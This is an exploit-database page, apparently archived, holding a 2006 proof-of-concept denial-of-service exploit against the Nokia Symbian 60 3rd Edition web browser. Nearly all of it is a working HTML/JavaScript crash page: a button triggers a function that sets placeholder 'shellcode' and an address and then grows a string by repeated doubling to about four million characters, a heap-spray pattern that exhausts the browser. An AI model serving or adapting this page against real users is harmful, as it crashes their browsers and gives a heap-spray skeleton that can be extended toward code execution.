[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Nokia Symbian 60 3rd Edition Browser Denial of Service Crash
# Published : 2006-08-13
# Author : Qode
# Previous Title : VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit
# Next Title : Opera 9 IRC Client Remote Denial of Service Exploit (c)


<!--

Nokia Browser Crash by Qode

http://www.qode.org

-->

<html><body><script>

function crash()

               {

               alert('Nokia Browser Crash by Qode');

               shellcode = unescape('%ucccc');

               fill = unescape('%ucccc');

               addr = 0x02020202;

               var b = fill;

               while (b.length <= 0x400000) b+=b;

               }

</script>

Nokia Browser Crash by Qode<br>

<input type='button' onClick='crash()' value='Crash'>

</body></html>

# www.Syue.com [2006-08-13]